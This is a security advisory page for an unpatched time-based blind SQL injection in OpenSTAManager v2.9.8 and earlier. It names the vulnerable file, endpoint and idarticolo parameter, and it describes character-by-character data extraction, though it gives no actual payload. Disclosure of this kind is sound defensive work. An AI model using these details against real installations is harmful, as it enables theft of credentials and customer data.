OpenSTAManager has a Time-Based Blind SQL Injection in Article Pricing Module
Description
OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Time-Based Blind SQL Injection vulnerability in the article pricing completion handler. The application fails to properly sanitize the idarticolo parameter before using it in SQL queries, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OpenSTAManager v2.9.8 and earlier have a critical Time-Based Blind SQL Injection in the article pricing module, allowing authenticated attackers to extract sensitive data.
Vulnerability
Overview
OpenSTAManager v2.9.8 and earlier contain a critical Time-Based Blind SQL Injection vulnerability in the article pricing completion handler. The root cause is the failure to sanitize the idarticolo parameter before it is directly concatenated into a SQL query in /modules/articoli/ajax/complete.php at line 70. In contrast, other parameters like idanagrafica are properly sanitized using prepare(), highlighting an inconsistent application of secure coding practices [1].
Exploitation
Details
An authenticated attacker can exploit this vulnerability by sending a crafted GET request to the endpoint /ajax_complete.php?op=getprezzi with a malicious idarticolo parameter. The attacker does not need any special privileges beyond authentication. By using time-based Boolean inference, the attacker can extract data character by character, observing response delays to infer the truth of injected conditions [1].
Impact
Successful exploitation allows an attacker to extract the entire contents of the database, including user credentials, customer data, and financial records. This can lead to complete compromise of the application and exposure of sensitive business information [1][3].
Mitigation
Status
As of the advisory date, no official patch has been released for this vulnerability. Users are advised to monitor the project repository for updates and, in the interim, apply input validation or restrict access to the vulnerable endpoint to trusted users only [1].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
devcode-it/openstamanagerPackagist | <= 2.9.8 | — |
Affected products
2- Range: <=2.9.8
- devcode-it/openstamanagerv5Range: <= 2.9.8
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3- github.com/advisories/GHSA-p864-fqgv-92q4ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-24416ghsaADVISORY
- github.com/devcode-it/openstamanager/security/advisories/GHSA-p864-fqgv-92q4ghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.